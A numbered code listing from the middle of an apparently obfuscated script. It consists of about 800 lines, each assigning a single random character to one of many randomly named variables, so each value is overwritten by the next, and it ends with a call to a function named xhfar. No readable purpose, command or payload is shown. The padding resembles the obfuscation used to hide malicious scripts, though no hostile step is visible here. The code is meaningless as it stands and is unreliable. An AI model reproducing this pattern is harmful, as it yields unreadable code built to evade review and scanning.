671 | fsmvwzl = "s"; | |
672 | fsmvwzl = "o"; | |
673 | fsmvwzl = "E"; | |
674 | fsmvwzl = "U"; | |
675 | fsmvwzl = "Y"; | |
676 | fsmvwzl = "e"; | |
677 | fsmvwzl = "b"; | |
678 | fsmvwzl = "X"; | |
679 | fsmvwzl = "q"; | |
680 | fsmvwzl = "i"; | |
681 | fsmvwzl = "O"; | |
682 | fsmvwzl = "r"; | |
683 | fsmvwzl = "G"; | |
684 | fsmvwzl = "h"; | |
685 | fsmvwzl = "e"; | |
686 | fsmvwzl = "W"; | |
687 | fsmvwzl = "G"; | |
688 | fsmvwzl = "o"; | |
689 | fsmvwzl = "C"; | |
690 | fsmvwzl = "n"; | |
691 | fsmvwzl = "t"; | |
692 | fsmvwzl = "P"; | |
693 | fsmvwzl = "Y"; | |
694 | fsmvwzl = "K"; | |
695 | fsmvwzl = "W"; | |
696 | fsmvwzl = "D"; | |
697 | fsmvwzl = "n"; | |
698 | fsmvwzl = "k"; | |
699 | fsmvwzl = "S"; | |
700 | qovowshx = "x"; | |
701 | qovowshx = "B"; | |
702 | qovowshx = "Z"; | |
703 | qovowshx = "B"; | |
704 | qovowshx = "v"; | |
705 | qovowshx = "W"; | |
706 | qovowshx = "R"; | |
707 | qovowshx = "z"; | |
708 | qovowshx = "X"; | |
709 | qovowshx = "c"; | |
710 | aiplly = "j"; | |
711 | aiplly = "o"; | |
712 | aiplly = "p"; | |
713 | xgijxjty = "d"; | |
714 | xgijxjty = "m"; | |
715 | xgijxjty = "t"; | |
716 | xgijxjty = "Z"; | |
717 | xgijxjty = "U"; | |
718 | xgijxjty = "b"; | |
719 | xgijxjty = "A"; | |
720 | xgijxjty = "O"; | |
721 | xgijxjty = "M"; | |
722 | xgijxjty = "N"; | |
723 | xgijxjty = "N"; | |
724 | xgijxjty = "K"; | |
725 | xgijxjty = "W"; | |
726 | xgijxjty = "N"; | |
727 | xgijxjty = "P"; | |
728 | xgijxjty = "L"; | |
729 | xgijxjty = "w"; | |
730 | xgijxjty = "a"; | |
731 | xgijxjty = "M"; | |
732 | xgijxjty = "u"; | |
733 | xgijxjty = "l"; | |
734 | xgijxjty = "g"; | |
735 | xgijxjty = "j"; | |
736 | xgijxjty = "s"; | |
737 | xgijxjty = "t"; | |
738 | xgijxjty = "C"; | |
739 | xgijxjty = "p"; | |
740 | xgijxjty = "k"; | |
741 | xgijxjty = "C"; | |
742 | xgijxjty = "x"; | |
743 | xgijxjty = "n"; | |
744 | xgijxjty = "K"; | |
745 | xgijxjty = "L"; | |
746 | bilmkc = "s"; | |
747 | bilmkc = "h"; | |
748 | bilmkc = "c"; | |
749 | bilmkc = "a"; | |
750 | bilmkc = "I"; | |
751 | bilmkc = "B"; | |
752 | bilmkc = "u"; | |
753 | bilmkc = "W"; | |
754 | bilmkc = "l"; | |
755 | bilmkc = "J"; | |
756 | bilmkc = "l"; | |
757 | bilmkc = "d"; | |
758 | bilmkc = "A"; | |
759 | bilmkc = "q"; | |
760 | bilmkc = "U"; | |
761 | onfcxk = "f"; | |
762 | onfcxk = "g"; | |
763 | onfcxk = "K"; | |
764 | onfcxk = "N"; | |
765 | onfcxk = "N"; | |
766 | onfcxk = "W"; | |
767 | onfcxk = "g"; | |
768 | onfcxk = "h"; | |
769 | onfcxk = "n"; | |
770 | onfcxk = "A"; | |
771 | onfcxk = "X"; | |
772 | onfcxk = "W"; | |
773 | onfcxk = "G"; | |
774 | onfcxk = "I"; | |
775 | onfcxk = "r"; | |
776 | onfcxk = "u"; | |
777 | onfcxk = "x"; | |
778 | onfcxk = "I"; | |
779 | onfcxk = "F"; | |
780 | onfcxk = "O"; | |
781 | onfcxk = "e"; | |
782 | onfcxk = "o"; | |
783 | onfcxk = "n"; | |
784 | onfcxk = "r"; | |
785 | onfcxk = "o"; | |
786 | onfcxk = "k"; | |
787 | onfcxk = "j"; | |
788 | onfcxk = "x"; | |
789 | onfcxk = "Z"; | |
790 | onfcxk = "H"; | |
791 | onfcxk = "K"; | |
792 | onfcxk = "x"; | |
793 | onfcxk = "C"; | |
794 | onfcxk = "D"; | |
795 | onfcxk = "S"; | |
796 | onfcxk = "l"; | |
797 | onfcxk = "s"; | |
798 | onfcxk = "A"; | |
799 | onfcxk = "F"; | |
800 | onfcxk = "k"; | |
801 | onfcxk = "w"; | |
802 | onfcxk = "I"; | |
803 | onfcxk = "T"; | |
804 | onfcxk = "t"; | |
805 | onfcxk = "Q"; | |
806 | unoisajqo = "x"; | |
807 | unoisajqo = "A"; | |
808 | unoisajqo = "n"; | |
809 | unoisajqo = "k"; | |
810 | unoisajqo = "z"; | |
811 | unoisajqo = "r"; | |
812 | unoisajqo = "b"; | |
813 | unoisajqo = "x"; | |
814 | unoisajqo = "N"; | |
815 | unoisajqo = "l"; | |
816 | unoisajqo = "o"; | |
817 | unoisajqo = "j"; | |
818 | unoisajqo = "k"; | |
819 | unoisajqo = "x"; | |
820 | unoisajqo = "f"; | |
821 | unoisajqo = "N"; | |
822 | unoisajqo = "O"; | |
823 | unoisajqo = "V"; | |
824 | unoisajqo = "z"; | |
825 | unoisajqo = "p"; | |
826 | unoisajqo = "d"; | |
827 | unoisajqo = "w"; | |
828 | unoisajqo = "c"; | |
829 | unoisajqo = "k"; | |
830 | unoisajqo = "d"; | |
831 | edyibf = "r"; | |
832 | edyibf = "V"; | |
833 | edyibf = "e"; | |
834 | edyibf = "e"; | |
835 | edyibf = "U"; | |
836 | edyibf = "F"; | |
837 | edyibf = "P"; | |
838 | edyibf = "a"; | |
839 | edyibf = "P"; | |
840 | edyibf = "m"; | |
841 | edyibf = "f"; | |
842 | edyibf = "H"; | |
843 | edyibf = "C"; | |
844 | edyibf = "p"; | |
845 | edyibf = "a"; | |
846 | edyibf = "G"; | |
847 | edyibf = "f"; | |
848 | edyibf = "Q"; | |
849 | edyibf = "X"; | |
850 | edyibf = "x"; | |
851 | edyibf = "r"; | |
852 | edyibf = "a"; | |
853 | edyibf = "I"; | |
854 | edyibf = "l"; | |
855 | edyibf = "d"; | |
856 | edyibf = "R"; | |
857 | edyibf = "O"; | |
858 | edyibf = "X"; | |
859 | edyibf = "e"; | |
860 | edyibf = "O"; | |
861 | edyibf = "D"; | |
862 | edyibf = "U"; | |
863 | edyibf = "H"; | |
864 | edyibf = "b"; | |
865 | edyibf = "W"; | |
866 | edyibf = "R"; | |
867 | bugexgzr = "n"; | |
868 | bugexgzr = "J"; | |
869 | bugexgzr = "Q"; | |
870 | bugexgzr = "x"; | |
871 | bugexgzr = "M"; | |
872 | bugexgzr = "H"; | |
873 | bugexgzr = "z"; | |
874 | bugexgzr = "v"; | |
875 | bugexgzr = "w"; | |
876 | bugexgzr = "P"; | |
877 | bugexgzr = "m"; | |
878 | bugexgzr = "f"; | |
879 | bugexgzr = "d"; | |
880 | bugexgzr = "E"; | |
881 | bugexgzr = "d"; | |
882 | bugexgzr = "j"; | |
883 | bugexgzr = "r"; | |
884 | bugexgzr = "S"; | |
885 | bugexgzr = "s"; | |
886 | bugexgzr = "H"; | |
887 | bugexgzr = "K"; | |
888 | bugexgzr = "V"; | |
889 | bugexgzr = "Q"; | |
890 | bugexgzr = "p"; | |
891 | bugexgzr = "I"; | |
892 | bugexgzr = "u"; | |
893 | bugexgzr = "M"; | |
894 | bugexgzr = "h"; | |
895 | bugexgzr = "f"; | |
896 | bugexgzr = "F"; | |
897 | bugexgzr = "o"; | |
898 | bugexgzr = "n"; | |
899 | bugexgzr = "P"; | |
900 | bugexgzr = "q"; | |
901 | bugexgzr = "e"; | |
902 | zmvbjw = "V"; | |
903 | zmvbjw = "H"; | |
904 | zmvbjw = "z"; | |
905 | zmvbjw = "U"; | |
906 | zmvbjw = "H"; | |
907 | zmvbjw = "h"; | |
908 | zmvbjw = "H"; | |
909 | zmvbjw = "i"; | |
910 | zmvbjw = "n"; | |
911 | zmvbjw = "j"; | |
912 | zmvbjw = "l"; | |
913 | zmvbjw = "7"; | |
914 | ooqthf = "p"; | |
915 | ooqthf = "i"; | |
916 | ooqthf = "i"; | |
917 | ooqthf = "C"; | |
918 | ooqthf = "j"; | |
919 | ooqthf = "u"; | |
920 | ooqthf = "h"; | |
921 | ooqthf = "k"; | |
922 | ooqthf = "v"; | |
923 | ooqthf = "c"; | |
924 | ooqthf = "e"; | |
925 | ooqthf = "F"; | |
926 | ooqthf = "l"; | |
927 | ooqthf = "G"; | |
928 | ooqthf = "J"; | |
929 | ooqthf = "L"; | |
930 | ooqthf = "e"; | |
931 | ooqthf = "P"; | |
932 | ooqthf = "d"; | |
933 | ooqthf = "O"; | |
934 | ooqthf = "q"; | |
935 | ooqthf = "r"; | |
936 | ooqthf = "m"; | |
937 | ooqthf = "G"; | |
938 | ooqthf = "K"; | |
939 | ooqthf = ":"; | |
940 | uenpu = "w"; | |
941 | uenpu = "P"; | |
942 | uenpu = "t"; | |
943 | uenpu = "g"; | |
944 | uenpu = "z"; | |
945 | uenpu = "S"; | |
946 | uenpu = "W"; | |
947 | uenpu = "K"; | |
948 | uenpu = "G"; | |
949 | uenpu = "I"; | |
950 | uenpu = "d"; | |
951 | uenpu = "q"; | |
952 | uenpu = "g"; | |
953 | uenpu = "O"; | |
954 | uenpu = "a"; | |
955 | uenpu = "c"; | |
956 | uenpu = "K"; | |
957 | uenpu = "h"; | |
958 | uenpu = "j"; | |
959 | uenpu = "f"; | |
960 | ckrbzcaet = "r"; | |
961 | ckrbzcaet = "e"; | |
962 | ckrbzcaet = "K"; | |
963 | ckrbzcaet = "A"; | |
964 | ckrbzcaet = "D"; | |
965 | ckrbzcaet = "D"; | |
966 | ckrbzcaet = "h"; | |
967 | ckrbzcaet = "Z"; | |
968 | ckrbzcaet = "S"; | |
969 | ckrbzcaet = "O"; | |
970 | ckrbzcaet = "w"; | |
971 | ckrbzcaet = "f"; | |
972 | ckrbzcaet = "n"; | |
973 | ckrbzcaet = "z"; | |
974 | ckrbzcaet = "h"; | |
975 | ckrbzcaet = "T"; | |
976 | ckrbzcaet = "D"; | |
977 | ckrbzcaet = "I"; | |
978 | ckrbzcaet = "r"; | |
979 | ckrbzcaet = "P"; | |
980 | ckrbzcaet = "t"; | |
981 | ckrbzcaet = "d"; | |
982 | ckrbzcaet = "X"; | |
983 | ckrbzcaet = "J"; | |
984 | ckrbzcaet = "V"; | |
985 | ckrbzcaet = "d"; | |
986 | ckrbzcaet = "H"; | |
987 | ckrbzcaet = "e"; | |
988 | ckrbzcaet = "Z"; | |
989 | ckrbzcaet = "g"; | |
990 | ckrbzcaet = "X"; | |
991 | ckrbzcaet = "x"; | |
992 | ckrbzcaet = "Q"; | |
993 | ckrbzcaet = "A"; | |
994 | ckrbzcaet = "Q"; | |
995 | ckrbzcaet = "x"; | |
996 | ckrbzcaet = "F"; | |
997 | eyuanyifu = "k"; | |
998 | eyuanyifu = "P"; | |
999 | eyuanyifu = "l"; | |
1000 | eyuanyifu = "a"; | |
1001 | eyuanyifu = "L"; | |
1002 | eyuanyifu = "V"; | |
1003 | eyuanyifu = "d"; | |
1004 | eyuanyifu = "A"; | |
1005 | eyuanyifu = "b"; | |
1006 | eyuanyifu = "Y"; | |
1007 | eyuanyifu = "k"; | |
1008 | eyuanyifu = "Y"; | |
1009 | eyuanyifu = "n"; | |
1010 | eyuanyifu = "o"; | |
1011 | eyuanyifu = "l"; | |
1012 | eyuanyifu = "i"; | |
1013 | eyuanyifu = "g"; | |
1014 | eyuanyifu = "R"; | |
1015 | eyuanyifu = "f"; | |
1016 | eyuanyifu = "i"; | |
1017 | jgwcc = "O"; | |
1018 | jgwcc = "J"; | |
1019 | jgwcc = "R"; | |
1020 | jgwcc = "c"; | |
1021 | jgwcc = "z"; | |
1022 | jgwcc = "n"; | |
1023 | jgwcc = "B"; | |
1024 | jgwcc = "a"; | |
1025 | jgwcc = "z"; | |
1026 | jgwcc = "M"; | |
1027 | jgwcc = "r"; | |
1028 | jgwcc = "y"; | |
1029 | jgwcc = "e"; | |
1030 | jgwcc = "B"; | |
1031 | jgwcc = "Y"; | |
1032 | jgwcc = "W"; | |
1033 | jgwcc = "L"; | |
1034 | jgwcc = "M"; | |
1035 | jgwcc = "N"; | |
1036 | xjnlzyh = "A"; | |
1037 | xjnlzyh = "z"; | |
1038 | xjnlzyh = "r"; | |
1039 | xjnlzyh = "s"; | |
1040 | xjnlzyh = "Z"; | |
1041 | xjnlzyh = "H"; | |
1042 | xjnlzyh = "D"; | |
1043 | xjnlzyh = "N"; | |
1044 | xjnlzyh = "O"; | |
1045 | xjnlzyh = "g"; | |
1046 | xjnlzyh = "b"; | |
1047 | xjnlzyh = "K"; | |
1048 | xjnlzyh = "A"; | |
1049 | xjnlzyh = "W"; | |
1050 | xjnlzyh = "j"; | |
1051 | xjnlzyh = "E"; | |
1052 | xjnlzyh = "R"; | |
1053 | xjnlzyh = "b"; | |
1054 | xjnlzyh = "q"; | |
1055 | pyspfort = "Y"; | |
1056 | pyspfort = "c"; | |
1057 | pyspfort = "H"; | |
1058 | pyspfort = "k"; | |
1059 | pyspfort = "x"; | |
1060 | pyspfort = "w"; | |
1061 | pyspfort = "L"; | |
1062 | pyspfort = "E"; | |
1063 | pyspfort = "S"; | |
1064 | pyspfort = "a"; | |
1065 | pyspfort = "x"; | |
1066 | pyspfort = "h"; | |
1067 | pyspfort = "Z"; | |
1068 | pyspfort = "h"; | |
1069 | pyspfort = "v"; | |
1070 | pyspfort = "m"; | |
1071 | pyspfort = "Z"; | |
1072 | pyspfort = "p"; | |
1073 | pyspfort = "D"; | |
1074 | pyspfort = "N"; | |
1075 | pyspfort = "X"; | |
1076 | pyspfort = "r"; | |
1077 | pyspfort = "W"; | |
1078 | pyspfort = "c"; | |
1079 | pyspfort = "S"; | |
1080 | pyspfort = "S"; | |
1081 | pyspfort = "l"; | |
1082 | pyspfort = "M"; | |
1083 | pyspfort = "e"; | |
1084 | pyspfort = "s"; | |
1085 | pyspfort = "Z"; | |
1086 | pyspfort = "Z"; | |
1087 | pyspfort = "F"; | |
1088 | pyspfort = "w"; | |
1089 | pyspfort = "B"; | |
1090 | pyspfort = "C"; | |
1091 | pyspfort = "R"; | |
1092 | pyspfort = "T"; | |
1093 | pyspfort = "d"; | |
1094 | pyspfort = "F"; | |
1095 | pyspfort = "u"; | |
1096 | pyspfort = "9"; | |
1097 | fjaula = "C"; | |
1098 | fjaula = "Q"; | |
1099 | fjaula = "p"; | |
1100 | fjaula = "w"; | |
1101 | fjaula = "D"; | |
1102 | fjaula = "w"; | |
1103 | fjaula = "h"; | |
1104 | fjaula = "z"; | |
1105 | fjaula = "P"; | |
1106 | fjaula = "S"; | |
1107 | fjaula = "X"; | |
1108 | fjaula = "N"; | |
1109 | fjaula = "t"; | |
1110 | fjaula = "w"; | |
1111 | fjaula = "f"; | |
1112 | fjaula = "k"; | |
1113 | fjaula = "i"; | |
1114 | fjaula = "U"; | |
1115 | fjaula = "v"; | |
1116 | fjaula = "b"; | |
1117 | fjaula = "R"; | |
1118 | fjaula = "c"; | |
1119 | fjaula = "p"; | |
1120 | fjaula = "O"; | |
1121 | fjaula = "t"; | |
1122 | fjaula = "y"; | |
1123 | fjaula = "O"; | |
1124 | fjaula = "X"; | |
1125 | fjaula = "a"; | |
1126 | fjaula = "g"; | |
1127 | fjaula = "G"; | |
1128 | fjaula = "x"; | |
1129 | fjaula = "M"; | |
1130 | fjaula = "v"; | |
1131 | fjaula = "i"; | |
1132 | fjaula = "N"; | |
1133 | fjaula = "U"; | |
1134 | fjaula = "J"; | |
1135 | fjaula = "k"; | |
1136 | fjaula = "v"; | |
1137 | fjaula = "I"; | |
1138 | fjaula = "E"; | |
1139 | fjaula = "X"; | |
1140 | fjaula = "a"; | |
1141 | dkamvfh = "x"; | |
1142 | dkamvfh = "D"; | |
1143 | dkamvfh = "z"; | |
1144 | dkamvfh = "V"; | |
1145 | dkamvfh = "e"; | |
1146 | dkamvfh = "n"; | |
1147 | dkamvfh = "H"; | |
1148 | dkamvfh = "w"; | |
1149 | dkamvfh = "B"; | |
1150 | dkamvfh = "L"; | |
1151 | dkamvfh = "i"; | |
1152 | dkamvfh = "p"; | |
1153 | dkamvfh = "e"; | |
1154 | dkamvfh = "C"; | |
1155 | dkamvfh = "I"; | |
1156 | dkamvfh = "h"; | |
1157 | dkamvfh = "X"; | |
1158 | dkamvfh = "D"; | |
1159 | dkamvfh = "A"; | |
1160 | dkamvfh = "r"; | |
1161 | dkamvfh = "x"; | |
1162 | dkamvfh = "b"; | |
1163 | dkamvfh = "H"; | |
1164 | dkamvfh = "K"; | |
1165 | dkamvfh = "p"; | |
1166 | dkamvfh = "G"; | |
1167 | dkamvfh = "o"; | |
1168 | dkamvfh = "R"; | |
1169 | dkamvfh = "y"; | |
1170 | dkamvfh = "y"; | |
1171 | dkamvfh = "C"; | |
1172 | dkamvfh = "l"; | |
1173 | dkamvfh = "Z"; | |
1174 | dkamvfh = "K"; | |
1175 | ctewsit = "a"; | |
1176 | ctewsit = "J"; | |
1177 | ctewsit = "w"; | |
1178 | ctewsit = "N"; | |
1179 | ctewsit = "Q"; | |
1180 | ctewsit = "L"; | |
1181 | ctewsit = "A"; | |
1182 | ctewsit = "U"; | |
1183 | ctewsit = "F"; | |
1184 | ctewsit = "S"; | |
1185 | ctewsit = "c"; | |
1186 | ctewsit = "K"; | |
1187 | ctewsit = "j"; | |
1188 | nlkiyqjaz = "w"; | |
1189 | nlkiyqjaz = "V"; | |
1190 | nlkiyqjaz = "d"; | |
1191 | nlkiyqjaz = "V"; | |
1192 | nlkiyqjaz = "A"; | |
1193 | nlkiyqjaz = "k"; | |
1194 | nlkiyqjaz = "y"; | |
1195 | nlkiyqjaz = "f"; | |
1196 | nlkiyqjaz = "N"; | |
1197 | nlkiyqjaz = "p"; | |
1198 | nlkiyqjaz = "i"; | |
1199 | nlkiyqjaz = "l"; | |
1200 | nlkiyqjaz = "X"; | |
1201 | nlkiyqjaz = "O"; | |
1202 | nlkiyqjaz = "E"; | |
1203 | nlkiyqjaz = "K"; | |
1204 | nlkiyqjaz = "M"; | |
1205 | nlkiyqjaz = "A"; | |
1206 | nlkiyqjaz = "K"; | |
1207 | nlkiyqjaz = "b"; | |
1208 | nlkiyqjaz = "M"; | |
1209 | nlkiyqjaz = "U"; | |
1210 | nlkiyqjaz = "I"; | |
1211 | nlkiyqjaz = "T"; | |
1212 | nlkiyqjaz = "V"; | |
1213 | nlkiyqjaz = "c"; | |
1214 | nlkiyqjaz = "L"; | |
1215 | nlkiyqjaz = "r"; | |
1216 | nlkiyqjaz = "R"; | |
1217 | nlkiyqjaz = "Z"; | |
1218 | nlkiyqjaz = "j"; | |
1219 | nlkiyqjaz = "y"; | |
1220 | nlkiyqjaz = "W"; | |
1221 | nlkiyqjaz = "v"; | |
1222 | nlkiyqjaz = "_"; | |
1223 | frsvlj = "x"; | |
1224 | frsvlj = "o"; | |
1225 | frsvlj = "R"; | |
1226 | frsvlj = "o"; | |
1227 | frsvlj = "Q"; | |
1228 | frsvlj = "E"; | |
1229 | frsvlj = "V"; | |
1230 | frsvlj = "Z"; | |
1231 | frsvlj = "F"; | |
1232 | frsvlj = "K"; | |
1233 | frsvlj = "F"; | |
1234 | frsvlj = "D"; | |
1235 | frsvlj = "V"; | |
1236 | frsvlj = "H"; | |
1237 | frsvlj = "E"; | |
1238 | frsvlj = "T"; | |
1239 | frsvlj = "o"; | |
1240 | frsvlj = "G"; | |
1241 | frsvlj = "q"; | |
1242 | frsvlj = "t"; | |
1243 | frsvlj = "Z"; | |
1244 | frsvlj = "u"; | |
1245 | frsvlj = "Q"; | |
1246 | frsvlj = "y"; | |
1247 | frsvlj = "e"; | |
1248 | frsvlj = "r"; | |
1249 | frsvlj = "M"; | |
1250 | frsvlj = "x"; | |
1251 | frsvlj = "r"; | |
1252 | frsvlj = "K"; | |
1253 | frsvlj = "w"; | |
1254 | frsvlj = "K"; | |
1255 | frsvlj = "s"; | |
1256 | frsvlj = "Z"; | |
1257 | frsvlj = "U"; | |
1258 | frsvlj = "U"; | |
1259 | frsvlj = "j"; | |
1260 | frsvlj = "D"; | |
1261 | frsvlj = "A"; | |
1262 | frsvlj = "z"; | |
1263 | frsvlj = "H"; | |
1264 | frsvlj = "c"; | |
1265 | frsvlj = "g"; | |
1266 | nmzybrwbu = "p"; | |
1267 | nmzybrwbu = "a"; | |
1268 | nmzybrwbu = "F"; | |
1269 | nmzybrwbu = "j"; | |
1270 | nmzybrwbu = "j"; | |
1271 | nmzybrwbu = "m"; | |
1272 | nmzybrwbu = "R"; | |
1273 | nmzybrwbu = "A"; | |
1274 | nmzybrwbu = "v"; | |
1275 | habqyl = "l"; | |
1276 | habqyl = "r"; | |
1277 | habqyl = "v"; | |
1278 | habqyl = "P"; | |
1279 | habqyl = "Y"; | |
1280 | habqyl = "S"; | |
1281 | habqyl = "N"; | |
1282 | habqyl = "s"; | |
1283 | habqyl = "f"; | |
1284 | habqyl = "P"; | |
1285 | habqyl = "K"; | |
1286 | habqyl = "C"; | |
1287 | habqyl = "w"; | |
1288 | habqyl = "m"; | |
1289 | habqyl = "m"; | |
1290 | habqyl = "c"; | |
1291 | habqyl = "v"; | |
1292 | habqyl = "e"; | |
1293 | habqyl = "O"; | |
1294 | habqyl = "E"; | |
1295 | habqyl = "X"; | |
1296 | habqyl = "Y"; | |
1297 | habqyl = "r"; | |
1298 | habqyl = "d"; | |
1299 | habqyl = "C"; | |
1300 | zbhordgug = "y"; | |
1301 | zbhordgug = "Z"; | |
1302 | zbhordgug = "t"; | |
1303 | zbhordgug = "\\"; | |
1304 | qhzwrsd = "c"; | |
1305 | qhzwrsd = "A"; | |
1306 | qhzwrsd = "I"; | |
1307 | qhzwrsd = "M"; | |
1308 | qhzwrsd = "o"; | |
1309 | qhzwrsd = "N"; | |
1310 | qhzwrsd = "i"; | |
1311 | qhzwrsd = "V"; | |
1312 | qhzwrsd = "w"; | |
1313 | qhzwrsd = "b"; | |
1314 | qhzwrsd = "W"; | |
1315 | qhzwrsd = "T"; | |
1316 | qhzwrsd = "h"; | |
1317 | qhzwrsd = "p"; | |
1318 | qhzwrsd = "s"; | |
1319 | qhzwrsd = "g"; | |
1320 | qhzwrsd = "w"; | |
1321 | qhzwrsd = "Y"; | |
1322 | qhzwrsd = "n"; | |
1323 | qhzwrsd = "G"; | |
1324 | qhzwrsd = "S"; | |
1325 | qhzwrsd = "K"; | |
1326 | qhzwrsd = "y"; | |
1327 | qhzwrsd = "r"; | |
1328 | qhzwrsd = "f"; | |
1329 | qhzwrsd = "Y"; | |
1330 | qhzwrsd = "M"; | |
1331 | qhzwrsd = "q"; | |
1332 | qhzwrsd = "q"; | |
1333 | qhzwrsd = "L"; | |
1334 | qhzwrsd = "X"; | |
1335 | qhzwrsd = "G"; | |
1336 | qhzwrsd = "Z"; | |
1337 | qhzwrsd = "I"; | |
1338 | qhzwrsd = "N"; | |
1339 | qhzwrsd = "p"; | |
1340 | qhzwrsd = "N"; | |
1341 | qhzwrsd = "L"; | |
1342 | qhzwrsd = "Y"; | |
1343 | qhzwrsd = "C"; | |
1344 | qhzwrsd = "b"; | |
1345 | qhzwrsd = "f"; | |
1346 | qhzwrsd = "h"; | |
1347 | qhzwrsd = "&"; | |
1348 | dqocuw = "F"; | |
1349 | dqocuw = "v"; | |
1350 | dqocuw = "l"; | |
1351 | dqocuw = "Q"; | |
1352 | dqocuw = "T"; | |
1353 | dqocuw = "F"; | |
1354 | dqocuw = "Z"; | |
1355 | dqocuw = "s"; | |
1356 | dqocuw = "q"; | |
1357 | dqocuw = "k"; | |
1358 | dqocuw = "s"; | |
1359 | dqocuw = "b"; | |
1360 | dqocuw = "v"; | |
1361 | dqocuw = "B"; | |
1362 | dqocuw = "v"; | |
1363 | dqocuw = "M"; | |
1364 | dqocuw = "V"; | |
1365 | dqocuw = "Y"; | |
1366 | dqocuw = "B"; | |
1367 | dqocuw = "F"; | |
1368 | dqocuw = "Y"; | |
1369 | dqocuw = "L"; | |
1370 | dqocuw = "f"; | |
1371 | dqocuw = "r"; | |
1372 | dqocuw = "N"; | |
1373 | dqocuw = "S"; | |
1374 | dqocuw = "E"; | |
1375 | dqocuw = "c"; | |
1376 | dqocuw = "t"; | |
1377 | dqocuw = "k"; | |
1378 | dqocuw = "m"; | |
1379 | dqocuw = "A"; | |
1380 | dqocuw = "D"; | |
1381 | dqocuw = "r"; | |
1382 | dqocuw = "w"; | |
1383 | dqocuw = "e"; | |
1384 | dqocuw = "Y"; | |
1385 | iaxwa = "b"; | |
1386 | iaxwa = "A"; | |
1387 | iaxwa = "w"; | |
1388 | iaxwa = "n"; | |
1389 | iaxwa = "a"; | |
1390 | iaxwa = "g"; | |
1391 | iaxwa = "d"; | |
1392 | iaxwa = "Q"; | |
1393 | iaxwa = "U"; | |
1394 | iaxwa = "b"; | |
1395 | iaxwa = "l"; | |
1396 | iaxwa = "n"; | |
1397 | iaxwa = "b"; | |
1398 | iaxwa = "H"; | |
1399 | iaxwa = "e"; | |
1400 | iaxwa = "t"; | |
1401 | iaxwa = "w"; | |
1402 | iaxwa = "t"; | |
1403 | iaxwa = "q"; | |
1404 | iaxwa = "H"; | |
1405 | iaxwa = "I"; | |
1406 | iaxwa = "U"; | |
1407 | iaxwa = "N"; | |
1408 | iaxwa = "P"; | |
1409 | iaxwa = "X"; | |
1410 | iaxwa = "x"; | |
1411 | iaxwa = "g"; | |
1412 | iaxwa = "H"; | |
1413 | iaxwa = "z"; | |
1414 | iaxwa = "b"; | |
1415 | iaxwa = "D"; | |
1416 | iaxwa = "F"; | |
1417 | iaxwa = "y"; | |
1418 | iaxwa = "X"; | |
1419 | iaxwa = "T"; | |
1420 | iaxwa = "g"; | |
1421 | iaxwa = "m"; | |
1422 | iaxwa = "n"; | |
1423 | iaxwa = "g"; | |
1424 | iaxwa = "W"; | |
1425 | iaxwa = "l"; | |
1426 | iaxwa = "b"; | |
1427 | iaxwa = "U"; | |
1428 | iaxwa = "e"; | |
1429 | iaxwa = "P"; | |
1430 | ycchhlc = "a"; | |
1431 | ycchhlc = "Z"; | |
1432 | ycchhlc = "s"; | |
1433 | ycchhlc = "w"; | |
1434 | ycchhlc = "U"; | |
1435 | ycchhlc = "S"; | |
1436 | ycchhlc = "U"; | |
1437 | ycchhlc = "V"; | |
1438 | ycchhlc = "X"; | |
1439 | ycchhlc = "E"; | |
1440 | ycchhlc = "q"; | |
1441 | ycchhlc = "R"; | |
1442 | ycchhlc = "A"; | |
1443 | ycchhlc = "a"; | |
1444 | ycchhlc = "n"; | |
1445 | ycchhlc = "m"; | |
1446 | ycchhlc = "x"; | |
1447 | ycchhlc = "g"; | |
1448 | ycchhlc = "I"; | |
1449 | ycchhlc = "B"; | |
1450 | ycchhlc = "F"; | |
1451 | ycchhlc = "p"; | |
1452 | ycchhlc = "Z"; | |
1453 | ycchhlc = "L"; | |
1454 | ycchhlc = "S"; | |
1455 | ycchhlc = "r"; | |
1456 | ycchhlc = "E"; | |
1457 | ycchhlc = "V"; | |
1458 | ycchhlc = "f"; | |
1459 | ycchhlc = "o"; | |
1460 | ycchhlc = "J"; | |
1461 | ycchhlc = "x"; | |
1462 | ycchhlc = "t"; | |
1463 | ycchhlc = "\""; | |
1464 | xhfar ( ); |
|